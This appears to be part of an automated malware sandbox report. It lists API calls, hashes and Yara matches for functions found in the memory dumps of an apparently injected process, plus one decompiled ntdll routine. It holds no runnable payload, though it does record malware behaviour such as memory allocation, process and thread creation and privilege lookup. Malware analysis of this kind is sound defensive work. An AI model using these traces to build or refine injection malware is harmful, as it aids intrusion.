                  • Instruction ID: 754777cd9f12b4ddc21588b24ff3640eac3b5568e2cbfd9f94980d2d19765fe1
                  • Opcode Fuzzy Hash: c6ba5b996d80282ef4d40e939a3623e0c582f228b3eefefef00f5a8c6f0c3eb5
                  • Instruction Fuzzy Hash: 6BF0F8B5201208ABDB14DF99CC84EEB7BA9AF88254F158248FE09A7251C671E811CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D22D11,00002000,00003000,00000004), ref: 02D387E9
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                  • Instruction ID: c3e7a0d1b8b0d085eed072c343f0de44fe563374f9165dbcccd4e0b2fcbc5225
                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                  • Instruction Fuzzy Hash: D0F015B2200208ABCB18DF89CC80EEB77ADEF88750F118148BE08A7241C630F810CBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtClose.NTDLL(02D33D40,?,?,02D33D40,00000000,FFFFFFFF), ref: 02D38725
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                  • Instruction ID: 81b51e5293bab0d9e4107c277a50599e4eeb7b04f61f02494a58b986b41531dd
                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                  • Instruction Fuzzy Hash: BAD012756002146BD714EB98CC45EE7775DEF44750F154455BA185B241C570F90086E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
                  • Instruction ID: a453ce70747d9644523013041b05991b157098bd128b860e15426eaa27141e51
                  • Opcode Fuzzy Hash: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
                  • Instruction Fuzzy Hash: D890026921304402E180B169584C60A10059BD1242F91D416A0006558CCA5588696371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
                  • Instruction ID: f2774c55b48b9a38da34e1ac1cf7d2138abb8305384d87e44f330a99da8cda9c
                  • Opcode Fuzzy Hash: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
                  • Instruction Fuzzy Hash: F990027131118802E110A169884870610059BD1241F51C412A0815558D87D588917172
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
                  • Instruction ID: 77f79df155a1e545931f540ad38914c925161fb363533986191680713fad1a3d
                  • Opcode Fuzzy Hash: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
                  • Instruction Fuzzy Hash: 6E90027120104802E100A5A9584C64610059BE0341F51D012A5015555EC7A588917171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
                  • Instruction ID: 0e728cfbe53f4eeaf03282aad55e1cdffbbad38007502003df8870f85b36c90c
                  • Opcode Fuzzy Hash: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
                  • Instruction Fuzzy Hash: 4A9002712010CC02E110A169884874A10059BD0341F55C412A4415658D87D588917171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                  • Instruction ID: 6ff9a4705a91f3839911f737f38d9dd811fbaf85ed41eb05eb16ec106d33f042
                  • Opcode Fuzzy Hash: 82622223433b67fce28f4c033bf12a47ddb3d44c5eb65a59c9cdaa71dc9754ae
                  • Instruction Fuzzy Hash: 5E90027120104C42E100A1694848B4610059BE0341F51C017A0115654D8755C8517571
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
                  • Instruction ID: 625084e0ae489f028e239da245256bd2972142c7e5dd55cda0d16637b609f40a
                  • Opcode Fuzzy Hash: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
                  • Instruction Fuzzy Hash: 5190027120104C02E180B169484864A10059BD1341F91C016A0016654DCB558A5977F1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                  • Instruction ID: 48497deafb2b1905aadacf880c48d9ddb83953f91b294848b700f0a41c9db37b
                  • Opcode Fuzzy Hash: 5e44633f42fcdd6a4de9db0c8784d91024bcae3f438ad9aaf330290cb4cde492
                  • Instruction Fuzzy Hash: E290027120508C42E140B1694848A4610159BD0345F51C012A0055694D97658D55B6B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
                  • Instruction ID: 729207362e6a40be38404bd712be6d800f691d9ebda7c42a07a2380d7b69f2d6
                  • Opcode Fuzzy Hash: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
                  • Instruction Fuzzy Hash: 7D90026121184442E200A5794C58B0710059BD0343F51C116A0145554CCA5588616571
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
                  • Instruction ID: 44262468ee87993cd8c67480df7a7b1f5ac87f0bba6650e7990ea0231f9e36bf
                  • Opcode Fuzzy Hash: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
                  • Instruction Fuzzy Hash: 3D9002A134104842E100A1694858B061005DBE1341F51C016E1055554D8759CC527176
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
                  • Instruction ID: a21c7100f66e6dbc31690d306647cedb605f27b7f832af482bbd0149157da482
                  • Opcode Fuzzy Hash: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
                  • Instruction Fuzzy Hash: 809002A1202044035105B1694858616500A9BE0241B51C022E1005590DC66588917175
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
                  • Instruction ID: 6d2177fbd1f68e94df6f0e0051f03f026adf72764409d6d14fd27e56a110e2ba
                  • Opcode Fuzzy Hash: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
                  • Instruction Fuzzy Hash: A69002B120104802E140B169484874610059BD0341F51C012A5055554E87998DD576B5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
                  • Instruction ID: f1908b52dd07e4782c4bc79afb7e865991fcc99e18ea6179c72111d84ded709f
                  • Opcode Fuzzy Hash: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
                  • Instruction Fuzzy Hash: B6900265211044031105E5690B4850710469BD5391351C022F1006550CD76188616171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
                  • Instruction ID: 27d58bb3dd5f8236bb02428bbdeea816966bdb51fda715268dede09c90fa8bea
                  • Opcode Fuzzy Hash: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
                  • Instruction Fuzzy Hash: 7690027120104813E111A169494870710099BD0281F91C413A0415558D97968952B171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
                  • Instruction ID: a5a557d8d0071509ae8945f0d43b9831a1bcb82960969143d2e686814248ae98
                  • Opcode Fuzzy Hash: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
                  • Instruction Fuzzy Hash: 85900261242085526545F16948485075006ABE0281791C013A1405950C86669856E671
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 02D37398
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 160024aed0479bc2c1a33c7cb7aa186926e21164ea43bac4dc63450672c7ad42
                  • Instruction ID: 1183f18d78030750c2bea1b9581e6058e7a561358ae41c6e6cc614c8c10ba0f2
                  • Opcode Fuzzy Hash: 160024aed0479bc2c1a33c7cb7aa186926e21164ea43bac4dc63450672c7ad42
                  • Instruction Fuzzy Hash: 56318EB6641604ABD712DF64C8A0FABF7B9EF48700F00811DFA5A9B240D770A845CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 02D37398
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 2c5597f45a96c0c43c6463b97e1a6d216cdab732c427244a00f7e0e18c2b9122
                  • Instruction ID: 3b57e9237dade40a67146ed711cb315d9c506b8f514c087c06642367687df375
                  • Opcode Fuzzy Hash: 2c5597f45a96c0c43c6463b97e1a6d216cdab732c427244a00f7e0e18c2b9122
                  • Instruction Fuzzy Hash: CF218CB6A41605ABD712DF64C8A1FABB7B8FB48704F008129FA599B240D374A845CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D23B93), ref: 02D3890D
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: .z`
                  • API String ID: 3298025750-1441809116
                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                  • Instruction ID: 864a59f2fcdf4244934f6e279394e509dd6682ae3966c70c6a0153b2ccba5f27
                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                  • Instruction Fuzzy Hash: F5E012B1200208ABDB18EF99CC48EA777ADEF88750F018558BE086B241C670E910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D29BA2
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction ID: e6936120256b70f9537ad9af1cbef49763e21c2ddceb446daff8c98afd49c2e6
                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction Fuzzy Hash: 72011EB6E0020DABDB10DBE4DC91FDDB3799B54308F1041A5E90897281F671EB18CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                  • Instruction ID: 860eac20afb7102b5fb341db2e7ffc55df3f4ec77e10c856b28867e716a99050
                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                  • Instruction Fuzzy Hash: 3101AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: b52bf700e7190265ee77e9c483130527f38775d5d1a90b7cda7f6c976cdc95a1
                  • Instruction ID: 360d8beef196d5e376cff28f505e4a43ce44f698945db625c059960f66123df5
                  • Opcode Fuzzy Hash: b52bf700e7190265ee77e9c483130527f38775d5d1a90b7cda7f6c976cdc95a1
                  • Instruction Fuzzy Hash: D501A4B2215108AFCB58CF89DC80EEB37AAAF8C354F158258BA0DD7240C630E851CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlAllocateHeap.NTDLL(02D33526,?,02D33C9F,02D33C9F,?,02D33526,?,?,?,?,?,00000000,00000000,?), ref: 02D388CD
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 9c09b41f37006e4609163ae0fe8f87cac94a10c858b150f86bb80a1d86ca6338
                  • Instruction ID: 42687522982e4dcc3840f06f86f056b3c042798306388b3edb5e4ea627fea4fe
                  • Opcode Fuzzy Hash: 9c09b41f37006e4609163ae0fe8f87cac94a10c858b150f86bb80a1d86ca6338
                  • Instruction Fuzzy Hash: 43F027B64082446FEB05EA78EC828E77758DE802147114A5DF88893302D175D818D6F1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCE0,?,?), ref: 02D3745C
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: d3980d446a3f9ea057f39f1eeb118e6f4bd7b66fb5ef81d139f3b23075802f48
                  • Instruction ID: d3232564c4f8c9c2171cafcffda272633b75ebfb01a4d1dcad54e8cbe47022f5
                  • Opcode Fuzzy Hash: d3980d446a3f9ea057f39f1eeb118e6f4bd7b66fb5ef81d139f3b23075802f48
                  • Instruction Fuzzy Hash: B6F0227378030036E2322598CC03FD7728ECB95B20F210029FB49BB3C0E5A5B9024AE4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCE0,?,?), ref: 02D3745C
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                  • Instruction ID: b5cd16ca53000e7e86db9ef483b651a0f0d5644cd05b358f4fbf5aa1c13e9e9a
                  • Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                  • Instruction Fuzzy Hash: FEE06D733802143AE2216599EC02FA7B29DDB85B35F14002AFA0DEA2C0D595F80146A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389A4
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: c03450fe15e591a132752a2007fe1fd35fd6b31d431ff0d5059bcf4eb05397d1
                  • Instruction ID: eda9dcebd071522ab55d877f31c1ce23473b93be0f2cb5903e0ffbcea3fbf78a
                  • Opcode Fuzzy Hash: c03450fe15e591a132752a2007fe1fd35fd6b31d431ff0d5059bcf4eb05397d1
                  • Instruction Fuzzy Hash: EDF0D4B2214549AB8B08CF99EC80CAB73AAEB9C200B108209F908C7245C630E812DB70
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D2CFB2,02D2CFB2,?,00000000,?,?), ref: 02D38A70
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                  • Instruction ID: 43b765ae665bb96cc2efd2aeadf232730df1c724f81eb1f27addf6b0505a79ef
                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                  • Instruction Fuzzy Hash: 12E01AB16002086BDB14DF49CC84EE737ADEF88650F018154BE0867241C970E8108BF5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlAllocateHeap.NTDLL(02D33526,?,02D33C9F,02D33C9F,?,02D33526,?,?,?,?,?,00000000,00000000,?), ref: 02D388CD
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                  • Instruction ID: 684ec36d07f1474de6c0501236884be659fe0839006ffd813c254ce58a657fc9
                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                  • Instruction Fuzzy Hash: 10E012B1200208ABDB18EF99CC44EA777ADEF88650F118558BE086B241C670F910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,02D27C83,?), ref: 02D2D44B
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                  • Instruction ID: 713c6649328f188d4dbd1870e0948d0cda075691e7e73045f748783cc0929f05
                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                  • Instruction Fuzzy Hash: 6CD0A7717503043BE610FAA4DC03F2672CD9B54B04F494074F948E73C3DA54F8018571
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                  • Instruction ID: d73c0bc47b361db7377fbea3dba4d41e0c23f8612a4cf06d937b75982474fef6
                  • Opcode Fuzzy Hash: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                  • Instruction Fuzzy Hash: 3BB09B719015C5C5E611D7704B0C71779047BD0741F16C057D1020641A477CC091F5B6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1808744c07c487f415e46b334bbabf6672027bedf2b96f50157d8773df3ec71e
                  • Instruction ID: 2403f26e19db3add2c3932942f3c7878b83891ff63b45b584f85abd566efa169
                  • Opcode Fuzzy Hash: 1808744c07c487f415e46b334bbabf6672027bedf2b96f50157d8773df3ec71e
                  • Instruction Fuzzy Hash: BFC08C73B480300AC3215CC93C410F8EB21C0EB232B283632E1C8E7043C202C4034288
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E03ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
                  				void* _t7;
                  				intOrPtr _t9;
                  				intOrPtr _t10;
                  				intOrPtr* _t12;
                  				intOrPtr* _t13;
                  				intOrPtr _t14;
                  				intOrPtr* _t15;
                  
                  				_t13 = __edx;
                  				_push(_a4);
                  				_t14 =  *[fs:0x18];
                  				_t15 = _t12;
                  				_t7 = E03A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                  				_push(_t13);
                  				E03AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                  				_t9 =  *_t15;
                  				if(_t9 == 0xffffffff) {
                  					_t10 = 0;
                  				} else {
                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                  				}
                  				_push(_t10);
                  				_push(_t15);
                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                  				return E03AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                  			}











                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03ABFDFA
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03ABFE2B
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03ABFE01
                  Memory Dump Source
                  • Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true
                  • Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp
                  • Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp
                  Similarity
